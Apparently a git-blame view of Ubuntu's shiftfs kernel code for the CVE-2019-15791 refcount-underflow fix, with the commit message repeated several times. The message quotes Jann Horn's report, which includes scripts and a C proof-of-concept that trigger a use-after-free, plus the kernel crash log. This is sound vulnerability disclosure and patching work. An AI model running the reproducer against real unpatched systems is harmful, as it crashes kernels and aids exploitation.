Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
*newfd = get_unused_fd_flags(lfd.file->f_flags);
|
2019-04-04 13:39:13 +00:00
|
|
|
if (*newfd < 0) {
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
fdput(lfd);
|
2021-04-09 18:01:06 +00:00
|
|
|
ret = *newfd;
|
|
|
|
goto err_free;
|
2019-04-04 13:39:13 +00:00
|
|
|
}
|
|
|
|
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
fd_install(*newfd, lfd.file);
|
2019-04-04 13:39:13 +00:00
|
|
|
|
|
|
|
if (cmd == BTRFS_IOC_SNAP_CREATE) {
|
|
|
|
v1->fd = *newfd;
|
|
|
|
ret = copy_to_user(arg, v1, sizeof(*v1));
|
|
|
|
v1->fd = oldfd;
|
|
|
|
} else {
|
|
|
|
v2->fd = *newfd;
|
|
|
|
ret = copy_to_user(arg, v2, sizeof(*v2));
|
|
|
|
v2->fd = oldfd;
|
|
|
|
}
|
|
|
|
|
2021-04-09 18:01:06 +00:00
|
|
|
if (!ret) {
|
|
|
|
*b1 = v1;
|
|
|
|
*b2 = v2;
|
|
|
|
} else {
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
